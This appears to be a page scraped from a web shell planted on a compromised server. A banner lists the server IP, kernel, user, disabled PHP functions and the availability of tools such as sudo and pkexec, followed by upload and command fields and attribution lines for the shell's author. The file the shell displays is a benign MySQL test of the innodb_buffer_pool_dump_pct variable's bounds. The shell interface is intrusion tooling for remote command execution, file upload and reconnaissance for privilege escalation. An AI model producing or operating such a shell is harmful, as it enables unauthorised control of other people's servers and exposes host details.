403Webshell
Server IP : 88.99.149.37  /  Your IP : 216.73.216.141
Web Server : nginx/1.31.2
System : Linux server-88-99-149-37 6.12.0-124.56.5.el10_1.x86_64 #1 SMP PREEMPT_DYNAMIC Fri May 15 06:12:08 EDT 2026 x86_64
User : muralimurth ( 1015)
PHP Version : 8.4.23
Disable Function : exec,system,passthru,shell_exec,proc_close,proc_open,dl,popen,show_source,posix_kill,posix_mkfifo,posix_getpwuid,posix_setpgid,posix_setsid,posix_setuid,posix_setgid,posix_seteuid,posix_setegid,posix_uname
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /usr/local/mysql/mysql-test/suite/sys_vars/t/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/local/mysql/mysql-test/suite/sys_vars/t/innodb_buffer_pool_dump_pct_basic.test
############################################
# Variable Name: innodb_buffer_pool_dump_pct
# Scope: GLOBAL
# Access Type: Dynamic
# Data Type: Integer
# Default Value: 100
# Range: 1-100
############################################

-- source include/have_innodb.inc

# Save the default value
SET @orig = @@global.innodb_buffer_pool_dump_pct;
SELECT @orig;

SET GLOBAL innodb_buffer_pool_dump_pct=3;

--echo # Do the dump

--disable_query_log
--disable_result_log
--source innodb_buffer_pool_dump_now_basic.test
--enable_result_log
--enable_query_log

# Set the valid value
SET GLOBAL innodb_buffer_pool_dump_pct=20;

# Check the value is 20
SELECT @@global.innodb_buffer_pool_dump_pct;

# Set the lower Boundary value
SET GLOBAL innodb_buffer_pool_dump_pct=1;

# Check the value is 1
SELECT @@global.innodb_buffer_pool_dump_pct;

# Set the upper boundary value
SET GLOBAL innodb_buffer_pool_dump_pct=100;

# Check the value is 100
SELECT @@global.innodb_buffer_pool_dump_pct;

# Set the beyond upper boundary value
SET GLOBAL innodb_buffer_pool_dump_pct=101;

# Check the value is 100
SELECT @@global.innodb_buffer_pool_dump_pct;

# Set the beyond lower boundary value
SET GLOBAL innodb_buffer_pool_dump_pct=-1;

# Check the value is 1
SELECT @@global.innodb_buffer_pool_dump_pct;

# Set the Default value
SET GLOBAL innodb_buffer_pool_dump_pct=Default;

# Check the default value
SELECT @@global.innodb_buffer_pool_dump_pct;

# Set with some invalid value
--error ER_WRONG_TYPE_FOR_VAR
SET GLOBAL innodb_buffer_pool_dump_pct='foo';

# Set without using Global
--error ER_GLOBAL_VARIABLE
SET innodb_buffer_pool_dump_pct=50;

# Restore original value
SET GLOBAL innodb_buffer_pool_dump_pct=@orig;

Youez - 2016 - github.com/yon3zu
LinuXploit